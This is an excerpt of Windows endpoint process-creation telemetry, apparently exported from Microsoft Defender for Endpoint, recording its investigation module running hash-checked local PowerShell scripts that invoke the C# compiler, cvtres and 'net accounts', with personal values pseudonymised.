+554,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:36.764554500+00:00,6444,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\a4yyxs35\a4yyxs35.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:32.310196700+00:00,8404,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a9713705aee948a3bbbe700bd681ded51e54e8b5.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a9713705aee948a3bbbe700bd681ded51e54e8b5.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '392cc8c75a0285f9d22c2b2c426a9ced73cc4d3ac2de972b65761b5b78cb4fca')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a9713705aee948a3bbbe700bd681ded51e54e8b5.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:36.839528700+00:00,2021-06-24 01:27:36.392409800+00:00,41660021-a319-46cc-965a-f42c65561de8,computerpii_0a470890c60768167990033d701e7bd881398861,171040,False,10.7740.19041.1052,False,11540474045175620,,11540474045175630,2021-06-24 01:25:32.310196700+00:00,8404,2021-06-24 01:25:32.310196700+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,8404,16512,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 01:25:32.352762+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+555,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:36.836037800+00:00,20572,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_2520748cc1bcce5f5ecfd26865da7abdde09f2bc.tmp"" ""c:\Windows\Temp\a4yyxs35\FilePII_0062e277a1a1af477411d683490c1dad13ab2e8c.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:36.764554500+00:00,6444,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\a4yyxs35\a4yyxs35.cmdline""",True,2021-06-24 01:25:32.310196700+00:00,8404,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:36.900166400+00:00,2021-06-24 01:27:36.392656400+00:00,3550f7d1-c2ad-4525-8490-2ebff3c77207,computerpii_0a470890c60768167990033d701e7bd881398861,171047,False,10.7740.19041.1052,False,11540474045175630,,11540474045175631,2021-06-24 01:25:36.764554500+00:00,6444,2021-06-24 01:25:36.764554500+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,6444,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+556,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:37.022164300+00:00,17424,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\hyamr0se.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:32.310208+00:00,9856,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '74f6783ed94295ae59e7df03bd12725ee0b09b441541d6d3514d201dda61615f')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:37.053110500+00:00,2021-06-24 01:27:36.393119100+00:00,f36a1a97-ebac-4e34-87dc-c196a825cb4f,computerpii_0a470890c60768167990033d701e7bd881398861,171059,False,10.7740.19041.1052,False,11540474045175623,,11540474045175632,2021-06-24 01:25:32.310208+00:00,9856,2021-06-24 01:25:32.310208+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,9856,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 01:25:32.352762+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+557,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:37.473648300+00:00,3584,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\nc4wsgcy.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:32.310199600+00:00,10096,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '724627c153aa3f2da50b20d86f92b3d8662a6e37d3ae15b37a885cee9c094894')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:37.519925800+00:00,2021-06-24 01:27:36.393496100+00:00,a3a2eba3-dcba-43f0-8b9d-dfffc421a8ba,computerpii_0a470890c60768167990033d701e7bd881398861,171070,False,10.7740.19041.1052,False,11540474045175621,,11540474045175633,2021-06-24 01:25:32.310199600+00:00,10096,2021-06-24 01:25:32.310199600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,10096,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 01:25:32.316858600+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+558,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:37.585310400+00:00,16776,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_a17a2524067c7f209d6bc670dc253e9cc26634ee.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_f15784948d23899bb59518d3319ed9ec5b9990f6.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:37.022164300+00:00,17424,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\hyamr0se.cmdline""",True,2021-06-24 01:25:32.310208+00:00,9856,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:37.623384600+00:00,2021-06-24 01:27:36.393529800+00:00,2aed91a1-fef0-44fe-ad97-13654c0cd3fb,computerpii_0a470890c60768167990033d701e7bd881398861,171071,False,10.7740.19041.1052,False,11540474045175632,,11540474045175634,2021-06-24 01:25:37.022164300+00:00,17424,2021-06-24 01:25:37.022164300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,17424,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+559,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:38.020254700+00:00,14036,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_db5e00a7c4312ece7707d9a3a355fe24d48eb1f9.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_cb140e14bc9f215c7c9e50194922bf49b4d5336c.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:37.473648300+00:00,3584,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\nc4wsgcy.cmdline""",True,2021-06-24 01:25:32.310199600+00:00,10096,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:38.107471+00:00,2021-06-24 01:27:36.393965800+00:00,34382d75-049f-4885-b878-b36367cbce87,computerpii_0a470890c60768167990033d701e7bd881398861,171084,False,10.7740.19041.1052,False,11540474045175633,,11540474045175635,2021-06-24 01:25:37.473648300+00:00,3584,2021-06-24 01:25:37.473648300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,3584,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+560,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:38.591612600+00:00,21316,net.exe,"""net.exe"" accounts",PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\net.exe,59904,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:32.310199600+00:00,10096,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '724627c153aa3f2da50b20d86f92b3d8662a6e37d3ae15b37a885cee9c094894')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:38.633497600+00:00,2021-06-24 01:27:36.394884600+00:00,8ec7ccec-aa9b-4b6a-9b33-40ef8daafe6d,computerpii_0a470890c60768167990033d701e7bd881398861,171111,False,10.7740.19041.1052,False,11540474045175621,,11540474045175636,2021-06-24 01:25:32.310199600+00:00,10096,2021-06-24 01:25:32.310199600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,10096,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 01:25:32.316858600+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command
+561,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:38.640214900+00:00,3856,net1.exe,net1 accounts,PortableExecutable,2021-03-11 01:07:22.990816900+00:00,C:\Windows\System32\net1.exe,183808,ba0bccc6029fbbe6d8b41197f252742f,253e6148ec7a95ea3950e032f9def1ec7c0e0cd172cc6d770d2807a64fc4a7ca,fa29205a40d3cbc69946784946c75eb66afd9950,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:38.591612600+00:00,21316,net.exe,"""net.exe"" accounts",True,2021-06-24 01:25:32.310199600+00:00,10096,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:38.653605200+00:00,2021-06-24 01:27:36.394986100+00:00,ead36377-a9ae-4404-8687-137377932c3c,computerpii_0a470890c60768167990033d701e7bd881398861,171114,False,10.7740.19041.1052,False,11540474045175636,,11540474045175637,2021-06-24 01:25:38.591612600+00:00,21316,2021-06-24 01:25:38.591612600+00:00,\Device\HarddiskVolume3\Windows\System32\net.exe,21316,128,ActiveProcessStartkey,C:\Windows\System32,59904,1986-05-05 23:55:09+00:00,2019-12-07 09:09:33.990210300+00:00,2021-06-24 01:25:38.600180600+00:00,2019-12-07 09:09:33.990210300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,net1.exe,net1.exe,Net Command
+562,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:39.590066+00:00,18480,WmiPrvSE.exe,wmiprvse.exe -secured -Embedding,PortableExecutable,2020-10-09 20:47:18.396187600+00:00,C:\Windows\System32\wbem\WmiPrvSE.exe,496640,60ff40cfd7fb8fe41ee4fe9ae5fe1c51,2198a7b58bccb758036b969ddae6cc2ece07565e2659a7c541a313a0492231a3,3ea7cc066317ac45f963c2227c4c7c50aa16eb7c,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:39.602625300+00:00,2021-06-24 01:27:36.399123500+00:00,e946f0f5-4bf7-4746-b430-eca51c72592e,computerpii_0a470890c60768167990033d701e7bd881398861,171232,False,10.7740.19041.1052,False,11540474045136908,,11540474045175638,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Wmiprvse.exe,Wmiprvse.exe,WMI Provider Host
+563,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:42.259799800+00:00,4004,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '55ac3e59e2c2dd5964cb1760cab52db52c7ff7bbb2cb5e65ddf2ab4ad48043d3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:42.287155300+00:00,2021-06-24 01:27:36.405022700+00:00,038095e1-58dc-4322-b837-4a241ab9523f,computerpii_0a470890c60768167990033d701e7bd881398861,171404,False,10.7740.19041.1052,False,11540474045175619,,11540474045175639,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,11584,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
